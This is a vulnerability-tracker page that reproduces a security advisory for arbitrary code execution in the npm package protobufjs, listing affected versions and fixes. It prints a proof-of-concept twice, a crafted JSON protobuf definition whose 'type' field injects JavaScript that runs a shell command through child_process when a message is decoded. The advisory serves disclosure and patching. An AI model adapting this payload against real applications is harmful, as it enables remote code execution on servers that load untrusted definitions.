Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
9.4
Malicious Code Execution in protobufjs
GHSA-xq3m-2v4x-88gg
Summary
Attackers can execute arbitrary code by manipulating protobuf definitions, potentially allowing them to take control of your website or server. This happens if an attacker can influence the protobuf definitions used by your application, either by modifying the definitions themselves or by tricking your application into using malicious definitions. To protect against this, ensure that you only use trusted protobuf definitions and validate any user-input data before using it to generate protobuf definitions.
What to do
- Update fenster protobufjs to version 8.0.1.
- Update fenster protobufjs to version 7.5.5.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| npm | fenster | protobufjs |
>= 8.0.0, < 8.0.1 < 7.5.5 Fix: upgrade to 8.0.1
|
Original title
Arbitrary code execution in protobufjs
Original description
### Summary
protobufjs compiles protobuf definitions into JS functions. Attackers can manipulate these definitions to execute arbitrary JS code.
### Details
Attackers can inject arbitrary code in the "type" fields of protobuf definitions, which will then execute during object decoding using that definition.
### PoC
```js
const protobuf = require('protobufjs');
maliciousDescriptor = JSON.parse(`{"nested":{"User":{"fields":{"id":{"type":"int32","id":1},"data":{"type":"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X","id":2}}},"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X":{"fields":{"content":{"type":"string","id":1}}}}}`)
const root = protobuf.Root.fromJSON(maliciousDescriptor);
const UserType = root.lookupType("User");
const userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]);
try {
const user = UserType.decode(userBytes);
} catch (e) {}
```
### Impact
Remote code execution when attackers can control the protobuf definition files.
protobufjs compiles protobuf definitions into JS functions. Attackers can manipulate these definitions to execute arbitrary JS code.
### Details
Attackers can inject arbitrary code in the "type" fields of protobuf definitions, which will then execute during object decoding using that definition.
### PoC
```js
const protobuf = require('protobufjs');
maliciousDescriptor = JSON.parse(`{"nested":{"User":{"fields":{"id":{"type":"int32","id":1},"data":{"type":"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X","id":2}}},"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X":{"fields":{"content":{"type":"string","id":1}}}}}`)
const root = protobuf.Root.fromJSON(maliciousDescriptor);
const UserType = root.lookupType("User");
const userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]);
try {
const user = UserType.decode(userBytes);
} catch (e) {}
```
### Impact
Remote code execution when attackers can control the protobuf definition files.
ghsa CVSS4.0
9.4
Vulnerability type
CWE-94
Code Injection
Published: 16 Apr 2026 · Updated: 16 Apr 2026 · First seen: 16 Apr 2026